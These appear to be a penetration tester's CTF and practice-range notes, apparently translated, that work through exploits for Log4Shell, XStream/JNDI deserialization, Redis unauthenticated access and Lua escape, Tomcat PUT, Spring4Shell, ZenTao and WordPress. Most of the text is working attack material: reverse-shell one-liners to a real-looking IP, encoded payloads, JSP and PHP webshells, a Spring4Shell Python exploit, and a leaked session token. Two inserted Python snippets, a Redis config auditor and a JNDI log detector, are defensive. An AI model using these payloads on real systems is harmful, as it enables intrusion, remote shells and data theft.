Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0
Referer: http://attck.ms08067.com/
Content-Type: application/xml

<java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>39.105.154.133</string>
                                                <int>6666</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>39.105.154.133</host>
                                        <port>6666</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -i >& /dev/tcp/39.105.154.133/9090 0>&1 2>&1" -A 39.105.154.133



bash -i >& /dev/tcp/39.105.154.133/8888 0>&1 2>&1


rmi://39.105.154.133:1099/jskfvr


java 1.8 8 11 17 

log4j2 ????

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<command to run>" -A "<attacker IP>"



java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0OS4xMjgvNzc3NyAwPiYx} |{base64,-d} | {bash,-i}" -A "<attacker IP>"

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy8xMDAwMSAwPiYx} |{base64,-d} | {bash,-i}" -A "39.105.154.133"


${jdni:rmi://39.105.154.133:1099/vacwrg}


==================================
Use the JNDI-Injection-Exploit.jar tool to generate the reverse shell (reverse-shell line: bash -i >& /dev/tcp/xx..xx.88/10001 0>&1)



Scenario ranges

Mirror site

ssrf

CTFHub Web - Web practice - SSRF (being updated~~) - AcWing

Just read it with the file:// protocol.


CodeExec

Directory scan

Found: [12:08:43] 200 - 199B - /shell.php

Visit it; the cmd GET parameter executes commands

?cmd=set


API function

ping


Redis ????

Unauthenticated access

// set the key
set xxx "\n\n* * * * * bash -i>& /dev/tcp/39.105.154.133/9090 0>&1\n\n"
// adds a key named xxx whose value is the reverse-shell line; the five asterisks mean "run every minute", and the \n are there as line breaks so crontab does not hit a syntax error. You can also try it without the \n and look at the garbage that results; stepping on that pit is what makes it stick.
// set the directory
config set dir /var/spool/cron/
// set the file name
config set dbfilename root
// save the key into the file "root"
save
Then just wait for it to fire.

flag{7b992efb5ab23a3a3d5100e366c48423}




http://101.43.64.97:36291/
redis-cli -h 101.43.64.97 -p 36291

// set the key
set xxx "\n\n* * * * * bash -i>& /dev/tcp/39.105.154.133/2333 0>&1\n\n"
// adds a key named xxx whose value is the reverse-shell line; the five asterisks mean "run every minute", and the \n are there as line breaks so crontab does not hit a syntax error. You can also try it without the \n and look at the garbage that results; stepping on that pit is what makes it stick.
// set the directory
config set dir /var/spool/cron/
// set the file name
config set dbfilename root
// save the key into the file "root"
save
Then just wait for it to fire.
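The cron write above only works because CONFIG SET can redirect `dir` and `dbfilename` on an instance that accepts unauthenticated commands from the network. As an added example, not from this write-up, the Python script below parses a redis.conf fragment and reports each of those conditions, with a weak configuration beside a hardened one. Both configuration texts are constructed here (they are not the range's config), and the password value is a placeholder.

```python
from typing import Dict, List

# Constructed redis.conf fragments (assumed inputs, not the range's config).
# The weak one has every property the cron-write trick above depends on.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
dir /var/spool/cron/
dbfilename root
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-LONG-RANDOM-PASSWORD
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
dbfilename dump.rdb
"""

SENSITIVE_DIRS = ("/var/spool/cron", "/etc", "/root", "/home", "/var/www")


def parse_conf(text: str) -> Dict[str, List[str]]:
    """directive -> list of argument strings (a directive such as
    rename-command may appear more than once); comments are skipped."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf.setdefault(parts[0].lower(), []).append(parts[1] if len(parts) > 1 else "")
    return conf


def audit_redis_conf(text: str) -> List[str]:
    """One finding per condition that the write-up's cron trick relies on."""
    conf = parse_conf(text)
    findings = []
    bind_tokens = " ".join(conf.get("bind", [])).split()
    if not bind_tokens or any(t in ("0.0.0.0", "::", "*") for t in bind_tokens):
        findings.append("bind: not restricted to loopback")
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    if not any(arg.strip() for arg in conf.get("requirepass", [])):
        findings.append("requirepass: missing, unauthenticated access")
    renamed = {}
    for arg in conf.get("rename-command", []):
        tokens = arg.split()
        if tokens:
            renamed[tokens[0].upper()] = tokens[1] if len(tokens) > 1 else ""
    if renamed.get("CONFIG") != '""':
        findings.append("rename-command: CONFIG SET can still redirect dir/dbfilename")
    for d in conf.get("dir", []):
        if d.rstrip("/").startswith(SENSITIVE_DIRS):
            findings.append(f"dir: RDB would land in a sensitive path ({d})")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, "->", audit_redis_conf(text) or ["no findings"])
```

Renaming CONFIG to the empty string disables it entirely; where operators need it, giving it a long random name and requiring a password achieves the same for the `config set dir` step, while the `dir` check catches a server that was already redirected at runtime and then had its config rewritten.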


redis guess

File inclusion

/etc/redis.conf


PUT

Tomcat arbitrary file write vulnerability (CVE-2017-12615)

Capture the request for the home page, edit it and change the request method:

PUT /1.jsp/ HTTP/1.1
Host: 101.43.64.97:37944
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell



Webshell, RCE:
<%
    java.io.InputStream is = Runtime.getRuntime()
                            .exec(request.getParameter("cmd"))
                            .getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    while ((a = is.read(b)) != -1) {
        out.print(new String(b));
    }
%>


xxxx?cmd=env


XXE

Login form,

CTF XXE - MustaphaMond - cnblogs


Pretty hard! ???

mysql


WEB

52

cve-2017-5638

Struts2 S2-045 remote code execution vulnerability (CVE-2017-5638)

Upload any file

Copy the URL over and scan it directly


redis-Lua

Chunqiu Cloud Range: CVE-2022-0543 (Redis sandbox escape) - CSDN blog

redis-cli -h xxx -p xxx

payload:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("env", "r"); local res = f:read("*a"); f:close(); return res' 0


flink

File upload of a jsp

.jar

Exploited with Goby.


weblogic

rce

Goby solved it instantly


SpringFramework

Spring Core is the toolkit in the Spring family responsible for discovering and creating beans and handling the relationships between them; it is the basic core package of the Spring framework, and every other Spring component depends on it.

#!/usr/bin/env python3
#coding:utf-8

import requests
import argparse
from urllib.parse import urljoin

def Exploit(url):
    headers = {"suffix":"%>//",
                "c1":"Runtime",
                "c2":"<%",
                "DNT":"1",
                "Content-Type":"application/x-www-form-urlencoded"

    }
    data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
    try:

        go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
        shellurl = urljoin(url, 'tomcatwar.jsp')
        shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
        if shellgo.status_code == 200:
            print(f"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami")
    except Exception as e:
        print(e)
        pass




def main():
    parser = argparse.ArgumentParser(description='Srping-Core Rce.')
    parser.add_argument('--file',help='url file',required=False)
    parser.add_argument('--url',help='target url',required=False)
    args = parser.parse_args()
    if args.url:
        Exploit(args.url)
    if args.file:
        with open (args.file) as f:
            for i in f.readlines():
                i = i.strip()
                Exploit(i)

if __name__ == '__main__':
    main()



L4 ???

Java version problem???????!!!!!!!!!!!!!!! Plus the VPS's own defences getting in the way.

log4j2-rce-cve-2021-44228 reproduction_log4j2 reproduction, VPS open ports - CSDN blog

i6bfpg.dnslog.cn

/solr/admin/cores?action=${jndi:ldap://rcilyy.dnslog.cn}
${jndi:ldap://${sys:java.version}.rcilyy.dnslog.cn}

http://domain/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.u8gtb8.dnslog.cn}


${jndi:ldap://<attacker-ip>:1389/Basic/Command/Base64/<base64-encoded command>}
${jndi:ldap://39.105.154.133:1389/Basic/Command/Base64/bHM=}


poc: ldap://null:1389/Basic/ReverseShell/[ip]/[port] --- Windows NOT supported

Actual construction: ${jndi:ldap://39.105.154.133:1389/Basic/ReverseShell/39.105.154.133/9090}
——————————
java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 39.105.154.133

${jndi:ldap://39.105.154.133:1389/Basic/ReverseShell/39.105.154.133/9090}




bash -i >& /dev/tcp/39.105.154.133/9999 0>&1

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A "39.105.154.133"


rmi://39.105.154.133:1099/qxavqn

${jndi:rmi://39.105.154.133:1099/2kzlcs}
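The lookup strings in this section arrive in several shapes: plain, URL-encoded, with `${sys:java.version}` nested inside the callback host, or with the literal "jndi" split by `${lower:j}`-style lookups. As an added example, not from this write-up, the Python detector below normalizes each log line before matching so that all three forms are caught and a bare `${sys:java.version}` is not. The sample log lines are constructed here; the addresses use the 203.0.113.0/24 documentation range and private 10.0.0.0/8 space, and the hostname uses the reserved .invalid TLD.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed Apache combined-format lines (not from the range).
SAMPLE_LOG = r'''
10.0.0.5 - - [12/Feb/2025:10:01:02 +0000] "GET /solr/admin/cores?action=${jndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.6 - - [12/Feb/2025:10:01:09 +0000] "GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Ajava.version%7D.example.invalid%7D HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.7 - - [12/Feb/2025:10:02:31 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}${lower:n}di:${lower:r}mi://203.0.113.7:1099/x}"
10.0.0.8 - - [12/Feb/2025:10:03:00 +0000] "GET /index.html?q=${sys:java.version} HTTP/1.1" 200 3072 "-" "Mozilla/5.0"
'''

# Innermost lookups used to split the literal "jndi": ${lower:J} / ${upper:j},
# and the default-value form ${anything:-j}.
_CASE_LOOKUP = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^${}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{\s*[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def normalize(text: str, rounds: int = 6) -> str:
    """URL-decode and collapse obfuscating lookups until nothing changes."""
    for _ in range(rounds):
        before = text
        text = urllib.parse.unquote(text)
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def detect_jndi(log_text: str) -> List[Dict[str, str]]:
    """One hit per line that contains a ${jndi:<scheme>:...} lookup after
    normalization. A nested ${sys:...} inside the URL is left intact: it is
    part of the evidence (it leaks the Java version to the callback host)."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client = line.split(" ", 1)[0]
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append({"client": client,
                         "scheme": m.group(1).lower(),
                         "evidence": norm[m.start():m.start() + 80]})
    return hits


if __name__ == "__main__":
    for hit in detect_jndi(SAMPLE_LOG):
        print(hit)
```

Detection here is for triage only; the remediation for the challenge's target remains upgrading Log4j or removing the JndiLookup class, which the referenced write-up does not cover.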


ZenTao CMS

ZenTao is a Chinese open-source project management tool. Credentials: admin:123456

ZenTao CMS file upload vulnerability (CNVD-C-2020-121325)

Preparation
1. Create shell.php on your own server
   with content <?php phpinfo();?>
2. Put shell.php in a directory the web server can serve

3. base64-encode the URL of the malicious file


Use the PoC to make the target download the file remotely
http://<range ip>/zentao/client-download-1
aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA=-1.html
Visit the shell
http://<range ip>/zentao/data/client/1/shell.php

OK, done.


ZenTao 12.4.2 getshell with admin privileges - FreeBuf

Qingdao Yiruan Tianchuang (青岛易软天创) ZenTao CMS command execution vulnerability (CNVD-2020-45147)

12.3.2

[CNVD/CVE] CNVD-C-2020-121325 - CSDN blog

aHR0cDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw



zentao/client-download-1-aHR0cDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw-1.html

zentao/data/client/1/shell.php

<?php echo "<?php phpinfo();?>";
<?php echo "<?php @eval($_POST[2]);?>";


SFRUUDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw
http://101.36.125.125:20092/zenteo/www/client-download-1-SFRUUDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw.html


cve-2019-9978

CVE-2019-9978 WordPress Social Warfare plugin RCE | St1_Fn

Log in --- enable the plugin --- build the exploit URL

http://39.105.154.133:9090/test.txt


http://your-targetIP/wp-admin/admin.php?page=social-warfare&swp_debug=load_options&swp_url=http://you-attack-ip/test.txt
http://101.36.125.125:37769/wp-admin/admin.php?page=social-warfare&swp_debug=load_options&swp_url=http://39.105.154.133:9090/test.txt

Tomcat (猫咪) & cve-2020-13935 (duplicate challenge)


Test PoC
https://github.com/RedTeamPentesting/CVE-2020-13935

1. $ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
2. $ cd CVE-2020-13935
3. $ go env -w GOPROXY=https://goproxy.cn
4. $ go build
5. $ ./tcdos ws://<range ip>/examples/websocket/echoStreamAnnotation

